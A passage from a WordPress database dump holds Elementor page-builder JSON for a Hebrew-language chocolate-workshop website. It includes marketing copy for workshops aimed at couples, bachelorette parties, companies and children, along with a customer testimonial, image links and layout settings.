\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1153,234,'_elementor_version','0.4'),(1158,235,'_wp_page_template','elementor_header_footer'),(1159,235,'_elementor_edit_mode','builder'),(1160,235,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd 